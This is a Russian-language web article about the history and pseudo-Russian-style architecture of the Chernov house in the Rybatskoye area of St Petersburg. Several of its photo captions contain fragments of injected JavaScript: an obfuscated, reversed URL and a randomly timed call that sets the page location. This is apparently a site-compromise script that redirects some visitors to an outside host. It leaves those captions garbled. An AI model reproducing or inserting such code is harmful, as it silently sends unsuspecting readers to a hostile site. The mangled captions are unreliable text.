Добавить в закладки

Историческое наследие в Петербурге. Дом Чернова на Октябрьской набережной

Окраины Санкт-Петербурга хранят немало редких архитектурных памятников, представляющих интерес не только для знатоков и исследователей архитектуры, но и для любителей истории родного края. К малоизведанным самими петербуржцами территориям относится бывшая деревня Глезнево, полностью исчезнувшая и вошедшая в исторический микрорайон Рыбацкое.

К этой прибрежной местности примыкал густой сосновый бор, принадлежавший ещё в XVIII веке князю Гагарину, из-за чего местность эту вскоре стали называть Сосновка, обозначая таким образом природную особенность этих живописных невских берегов.

Впрочем, сам хозяин земель в имении своём почти не жил. Многократно после его смерти переходили земли из рук в руки, пока их не купил полковник Александр Иванович Чернов. Он заказал для себя особняк у видного и популярного в то время архитектора Александра фон Гогена. Вот с этого самого момента и началась та жизнь Сосновки, какой привыкли видеть её нынешние жители города.

Дом Чернова

Дом Чернова. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-s/0b/94/d5/1a/caption.jpg»>media-cdn.tripadvisor.com

В 1889-м году в моде был так называемый псевдорусский стиль. Родилось это парадоксальное и очень яркое направление именно в Петербурге. Изначально город строился по классическим европейским образцам, и в его облике не было ничего общего со старинными городами вроде Ярославля или Пскова.

Русский стиль, кропотливо возрожденный архитекторами-энтузиастами, призван было словно наверстать для Петербурга упущенное, породнить его с другими русскими городами, для которых подобное направление было родным и естественным. В петербургском зодчестве росло воодушевление обращением к русским народным истокам, поэтому патриот Чернов предпочёл этот стиль для постройки своего имения.

Русский стиль

Русский стиль. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-s/12/fc/7d/45/2.jpg»>media-cdn.tripadvisor.com

Русский стиль в своём развитии прошёл несколько этапов. Условно его делят на московско-ярославский и на новгородско-псковский. Первый отличается большим ярким узорочьем, второй – скромностью и строгостью. Особняк для Чернова фон Гоген собирался построить именно в московско-ярославском стиле.

Надо отметить, что обычные доходные дома, построенные в русском стиле, порой смотрелись нелепо и не очень естественно, искусственно. Некоторые строгие критики прозвали этот стиль «петушиным». Однако для особняков стиль этот подходил классически.

Крыша

Крыша. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to_262-269158.jpg?mt=1482349795″>p2.citywalls.ru

Особняк Чернова похож на старинный терем. Он эффектно стоит на невысоком холме перед широкой лужайкой, где раньше был обширный парк, и решён в асимметричной форме. Оконца, башенки, миниатюрные колонки, шатровое завершение шпиля – всё это отчётливо напоминает постройки XVII века в Москве.

Вид сверху

Вид сверху. Фото: scontent.cdninstagram.com

Асимметричность композиции дома Чернова обусловлена ещё и личным пожеланием хозяина архитектору спроектировать все внутренние покои и помещения изолированно друг от друга. Больше всего полковник хотел, чтобы выход в его личный кабинет совершался не из центральной части дома, а через библиотеку, а уже только оттуда хозяин мог попасть в спальню. План был составлен так, чтобы выход на веранду, располагающуюся на втором уровне, мог совершаться только из личных покоев хозяина.

Внутреннее помещение

Внутреннее помещение. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to_339-347892.jpg?mt=1526752843″>p0.citywalls.ru

Изолированными друг от друга должны были быть и другие помещения: комната экономки, гостевые комнаты, бильярдная. Столовая не предполагалась для широких приёмов, поэтому тоже проектировалась фон Гогеном обособленно. Это и обусловило вынужденную необходимость архитектора отразить асимметрию внутренних помещений во внешнем виде фасада.

После революции, когда хозяин особняка эмигрировал заграницу, место пришло в упадок. Там по очереди располагались дом отдыха для рабочих Невской заставы, радиостанция для вещания в блокадном городе, поликлиника, больница, потом в особняке, переданном министерству связи, работали так называемые «глушилки», мешающие прохождению радиоволн западных радиостанций.

Окружающий дом живописный сад — остаток бывшей густой сосновой рощи, в 2007 году был благоустроен, проложены новые дорожки, восстановлены ограждения, расчищены лужайки.

Тем самым Петербург получил ещё одно знаменательное место для прогулок, которое в обозримом будущем станет ещё живописней после открытия для широкой публики знаменательного памятника архитектуры.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 21.07.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: